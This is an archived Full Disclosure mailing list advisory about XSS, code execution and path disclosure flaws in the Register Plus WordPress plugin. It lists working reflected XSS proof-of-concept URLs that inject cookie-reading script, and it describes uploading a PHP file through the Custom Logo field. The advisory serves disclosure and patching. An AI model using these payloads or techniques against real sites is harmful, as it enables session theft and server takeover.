Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Multiple new vulnerabilities in Register Plus for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Thu, 26 Jan 2012 21:07:06 +0200

Hello list!

I want to warn you about multiple new vulnerabilities in plugin Register
Plus for WordPress.

These are Cross-Site Scripting, Code Execution and Full path disclosure
vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are Register Plus 3.5.1 and previous versions.

Taking into account, that this plugin is no more supported by developer,
then users of the plugin need to fix these holes by themselves. Or to update
this plugin to version of Register Plus Redux with fixed vulnerabilities.
Which I've told about in previous advisory
(http://securityvulns.com/docs27545.html).

----------
Details:
----------

XSS (WASC-08):

By using function Autocomplete URL it's possible to conduct attack via GET:

http://site/wp-login.php?action=register&firstname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&lastname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&website=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&yahoo=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&jabber=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&about=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-login.php?action=register&regcode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are all those parameters, as at POST request. Which I've told
about earlier (http://websecurity.com.ua/4539/).

Persistent XSS (WASC-08):

If to set XSS code as file name (e.g. it's possible to create such file on
Linux and Unix systems) and to upload it, the code will execute at pages
http://site/wp-admin/options-general.php?page=register-plus and
http://site/wp-login.php?action=register.

Code Execution (WASC-31):

If to have access to plugin settings, it's possible to conduct Code
Execution (in field Custom Logo) via uploading of file with arbitrary
extension (e.g. PHP). For attack it's possible to upload just 1.php (unlike
Register Plus Redux, where it's not possible and bypass techniques need to
be used). This is because own uploader is using, not built-in WordPress.

Full path disclosure (WASC-13):

At turned on plugin's option "Enable Invitation Tracking Dashboard Widget"
the full path at the server will be shown at page
http://site/wp-admin/index.php.

------------
Timeline:
------------

2011.11.25 - found vulnerabilities in Register Plus Redux.
2011.11.25 - found vulnerabilities in Register Plus.
2011.11.30 - fixed vulnerabilities in Register Plus Redux.
2011.11.30 - released Register Plus Redux 3.8 (with fixed all
vulnerabilities of version 3.7.3.1). Which I recommend to use instead of
Register Plus.
2011.12.06 - announced at my site.
2011.12.08 - informed developer.
2012.01.26 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5547/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Multiple new vulnerabilities in Register Plus for WordPress MustLive (Jan 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]